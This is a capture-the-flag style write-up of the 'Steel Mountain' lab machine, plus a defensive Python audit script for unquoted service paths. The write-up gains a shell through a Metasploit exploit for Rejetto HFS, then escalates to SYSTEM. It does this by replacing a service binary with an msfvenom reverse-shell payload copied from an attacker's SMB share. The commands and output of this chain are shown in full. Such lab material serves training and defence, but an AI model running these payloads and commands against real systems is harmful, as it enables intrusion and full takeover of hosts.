
Steel Mountain

Metasploit Exploitation

  • Using: exploit/windows/http/rejetto_hfs_exec
  • PAYLOAD: windows/x64/shell/reverse_tcp
[*] Started reverse TCP handler on 10.10.20.30:4444 
[*] Using URL: http://10.10.20.30:4000/c9OfS9o
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /c9OfS9o
[*] Sending stage (336 bytes) to 10.10.32.61
[*] Command shell session 1 opened (10.10.20.30:4444 -> 10.10.32.61:49198) at 2022-10-10 07:19:16 +0200
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\IdUYf.vbs' on the target

Shell Banner:
Microsoft Windows [Version 6.3.9600]
-----

C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup> whoami
STEELMOUNTAIN\bill

  • Upgrading the Session to Meterpreter
msf6 exploit(windows/http/rejetto_hfs_exec) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.20.30:4433
[*] Sending stage (200774 bytes) to 10.10.32.61
[*] Meterpreter session 2 opened (10.10.20.30:4433 -> 10.10.32.61:49200) at 2022-10-10 07:20:17 +0200
[*] Stopping exploit/multi/handler
msf6 exploit(windows/http/rejetto_hfs_exec) > sessions

Active sessions
===============

Id  Name         Type         Information                                               Connection
--  ----         ----         -----------                                               ----------
1   shell        x64/windows  Shell Banner: Microsoft Windows [Version 6.3.9600] -----  10.10.20.30:4444 -> 10.10.32.61:49198 (10.10.32.61)
2   meterpreter  x64/windows  STEELMOUNTAIN\bill @ STEELMOUNTAIN                        10.10.20.30:4433 -> 10.10.32.61:49200 (10.10.32.61)
meterpreter > getuid 
Server username: STEELMOUNTAIN\bill
meterpreter > sysinfo
Computer : STEELMOUNTAIN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows

Enumeration

  • Enumerating the machine using PowerUp (PowerShell script)
meterpreter > upload PowerUp.ps1
[*] uploading : PowerUp.ps1 -> PowerUp.ps1
[*] uploaded : PowerUp.ps1 -> PowerUp.ps1
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS >
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks

  • The AdvancedSystemCareService9 service has an [Unquoted Service Path] and [CanRestart = True].
  • [Unquoted Service Paths] When a service is created whose executable path contains spaces and is not enclosed in quotes, a user can gain SYSTEM privileges (only if the vulnerable service runs as SYSTEM). This is because Windows treats each space as a possible end of the executable name and passes the rest of the service path as arguments, so it tries the shorter prefixes of the path before the full path.
  • [CanRestart = True] allows us to restart the service on the system ourselves. The application's directory is also writable.
ServiceName    : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
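The following Python is an added audit example, not part of the original write-up and not PowerUp's own code. It models the check PowerUp ran above from the defender's side: for a service ImagePath it lists the executables Windows would probe (each space-delimited prefix with ".exe" appended, then the full path, following the CreateProcess documentation), flags the candidates whose directory a low-privileged group can write to, and produces the quoted path that fixes the finding. The service inventory and the writable-directory set are constructed here; AdvancedSystemCareService9 and the writable C:\ come from the PowerUp output on this page, while the two other services are hypothetical negatives.

```python
import ntpath
from typing import Dict, List, Set

# Constructed sample inventory. The first entry mirrors the PowerUp finding on
# this page; the other two are hypothetical services added to show the
# non-vulnerable cases (already quoted, and no spaces in the path).
SAMPLE_SERVICES = [
    {"Name": "AdvancedSystemCareService9",
     "Path": r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
     "StartName": "LocalSystem"},
    {"Name": "QuotedExample",  # hypothetical
     "Path": r'"C:\Program Files\Vendor App\svc.exe" -k netsvcs',
     "StartName": "LocalSystem"},
    {"Name": "NoSpaceExample",  # hypothetical
     "Path": r"C:\Windows\System32\svchost.exe",
     "StartName": "LocalSystem"},
]

# Directories reported as writable by BUILTIN\Users (PowerUp reported C:\ on
# this page). Constructed input; on a real host this comes from an ACL audit.
WRITABLE_DIRS = {"C:\\"}


def _norm_dir(path: str) -> str:
    """Lower-case, backslash-separated, trailing backslash, so comparisons are exact."""
    return ntpath.normcase(ntpath.join(path, ""))


def candidate_executables(image_path: str) -> List[str]:
    """Return the executables Windows would try, in order, for a service ImagePath.

    A quoted path is unambiguous: only the quoted executable is returned. An
    unquoted path with spaces yields every prefix that ends at a space (with
    ".exe" appended when that prefix has no extension) followed by the full
    string. Without quotes the arguments cannot be told apart from the path,
    so the last candidate is the whole string as written in the registry.
    """
    image_path = image_path.strip()
    if image_path.startswith('"'):
        end = image_path.find('"', 1)
        return [image_path[1:end] if end != -1 else image_path[1:]]
    candidates = []
    for i, ch in enumerate(image_path):
        if ch == " ":
            prefix = image_path[:i]
            if "." not in ntpath.basename(prefix):
                prefix += ".exe"
            candidates.append(prefix)
    candidates.append(image_path)
    return candidates


def hijackable_candidates(image_path: str, writable_dirs: Set[str]) -> List[str]:
    """Candidates (including the real binary) whose directory is writable.

    A writable directory of an earlier candidate lets a user plant a binary
    that wins the search; a writable directory of the real binary lets the
    binary itself be replaced, which is what happened on this page.
    """
    writable = {_norm_dir(d) for d in writable_dirs}
    return [c for c in candidate_executables(image_path)
            if _norm_dir(ntpath.dirname(c)) in writable]


def quoted_image_path(image_path: str) -> str:
    """Remediation value: the path wrapped in quotes (assumes no trailing arguments)."""
    image_path = image_path.strip()
    return image_path if image_path.startswith('"') else f'"{image_path}"'


def audit_services(services: List[Dict[str, str]], writable_dirs: Set[str]) -> List[Dict]:
    """Flag services with an unquoted path containing spaces or a plantable candidate."""
    findings = []
    for svc in services:
        unquoted = len(candidate_executables(svc["Path"])) > 1
        plantable = hijackable_candidates(svc["Path"], writable_dirs)
        if unquoted or plantable:
            findings.append({
                "Name": svc["Name"],
                "StartName": svc["StartName"],
                "UnquotedServicePath": unquoted,
                "PlantableExecutables": plantable,
                "FixedPath": quoted_image_path(svc["Path"]),
            })
    return findings


if __name__ == "__main__":
    for finding in audit_services(SAMPLE_SERVICES, WRITABLE_DIRS):
        print(finding["Name"], "runs as", finding["StartName"])
        print("  plantable:", finding["PlantableExecutables"])
        print("  fix binPath= to:", finding["FixedPath"])
```

For the page's service the audit returns C:\Program.exe and C:\Program Files.exe as plantable (because C:\ is writable by BUILTIN\Users) and the quoted path as the fix; applying it with `sc config <name> binPath=` and removing write access for Users on C:\ and on the application directory closes both the search-order and the binary-replacement routes.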

PAYLOAD

  • Generating the PAYLOAD with MSFvenom
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=PORT -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

  • Uploading the payload through a Python SMB server (smbserver). From the target we can then replace ASCService.exe, the binary of the AdvancedSystemCareService9 service, with our reverse shell.
attacker@machine:~$ smbserver LINUXSHARE /mnt/SMBShare
  • copy will ask whether to overwrite the file: answer Yes
    • [It may be necessary to stop the service first, since the binary of a running service cannot be overwritten]
C:\Program Files (x86)\IObit\Advanced SystemCare> sc stop AdvancedSystemCareService9
C:\Program Files (x86)\IObit\Advanced SystemCare> copy \\ATTACKER_IP\LINUXSHARE\ASCService.exe ASCService.exe
Overwrite ASCService.exe? (Yes/No/All): Yes
1 file(s) copied.

Exploitation

  • Restarting the AdvancedSystemCareService9 service starts our reverse shell.
C:\Program Files (x86)\IObit\Advanced SystemCare> sc start AdvancedSystemCareService9

  • Before restarting the AdvancedSystemCareService9 service we start a Metasploit listener.
  • Using: multi/handler
  • PAYLOAD: windows/x64/shell_reverse_tcp
  • The new session runs with SYSTEM rights: NT AUTHORITY\SYSTEM
[*] Started reverse TCP handler on 10.10.20.30:4443 
[*] Command shell session 1 opened (10.10.20.30:4443 -> 10.10.32.61:49226) at 2022-10-10 07:29:47 +0200

Shell Banner:
Microsoft Windows [Version 6.3.9600]
-----

C:\Windows\system32> whoami
NT AUTHORITY\SYSTEM